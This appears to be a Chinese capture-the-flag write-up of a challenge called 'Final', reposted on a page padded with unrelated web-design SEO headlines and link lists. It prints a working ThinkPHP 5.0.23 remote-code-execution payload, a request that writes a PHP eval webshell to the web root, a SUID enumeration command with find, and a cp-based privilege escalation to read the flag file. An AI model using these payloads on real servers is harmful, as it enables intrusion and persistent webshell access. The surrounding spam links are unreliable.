当前位置: 首页 > news >正文

深圳前50强网站建设公司电子商务网店运营推广

深圳前50强网站建设公司,电子商务网店运营推广,室内设计师接单平台,wordpress底部菜单前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难 Final 考点: ThinkPHP 5.0.23 RCE一句话木马上传SUID提权(find) 解题: 首先页面就给了ThinkPHP V5, 那无非考…

 前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难

Final

考点:

ThinkPHP 5.0.23 RCE+一句话木马上传+SUID提权(find)

 解题:

首先页面就给了ThinkPHP V5, 那无非考的就是ThinkPHP版本的漏洞 ,经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解:

https://blog.csdn.net/Lucky1youzi/article/details/128740552

我们按照他说的做,首先抓包进行传参

GET:index.php?s=captcha
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 这个参数1 是可以进行修改的,竟然能出现phpinfo页面 ,那我们就可以进行RCE,但是我们发现命令执行参数全被ban了,可能是权限的问题 ,我们上传一句话木马

_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/1.php

然后蚁剑连接后发现根目录下存在flag文件

但是里面内容没有 ,一眼没权限,我们去终端看看

我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读

尝试chmod无果

然后我们这里就查看具有SUID权限的命令:

find / -user root -perm -4000 -print 2>/dev/null

这个利用find进行提权可以访问

https://blog.csdn.net/rlenew/article/details/111873682

 

我们使用cp命令SUID提权读取Flag:

cp /flag_dd3f6380aa0d /dev/stdout

 / dev / stdout是—个特殊的文件,代表标准输出。

http://www.dinnco.com/news/15345.html

相关文章:

  • 做百度微信小程序都有哪些网站常用的关键词优化策略有哪些
  • 公主岭市住房和城乡建设局网站国外网站推广
  • 如何提高网站安全广告公司怎么找客户资源
  • 自助建站凡科网网络营销比较成功的企业
  • 网站建设中 模版下载2021年经典营销案例
  • 学网站开发工作好找吗搜索引擎优化实训心得
  • 思源黑体可以做网站优秀软文范例200字
  • 博彩网站怎么做东营百度推广电话
  • wordpress加载慢整站优化报价
  • 做损坏文档的网站百度竞价有点击无转化
  • 平湖网站建设广安百度推广代理商
  • 阿里巴巴国际站网站做销售方案新品牌推广策略
  • 我想做个网站 详解怎么做网站搜索引擎推广
  • 南京电商网站开发公司微信管理软件哪个最好
  • php网站整合dz论坛网推放单平台
  • 做移动网站首页软优化合作平台
  • java后台一对一直播app开发影响seo排名的因素
  • 外贸公司网站建设 重点是什么意思网络营销的4p策略
  • 福建志佳建设工程发展有限公司网站semi
  • 同一ip网站线上直播营销策划方案
  • 做彩票网站推广犯法吗淘宝联盟怎么推广
  • jsp网站开发大作业南京网站推广公司
  • 做网站被诈骗如何看待百度竞价排名
  • 郑州做网站 熊掌号搜索引擎推广案例
  • 交互型网站提高网站排名软件
  • 长沙网站开发湖南微联讯点不错柳州今日头条新闻
  • 做棋子网站怎么提高浏览量软文案例200字
  • 软件技术的发展前景seo可以从哪些方面优化
  • 厦门网站建设设互联网舆情信息
  • 抖音橙子建站官网网站制作流程是什么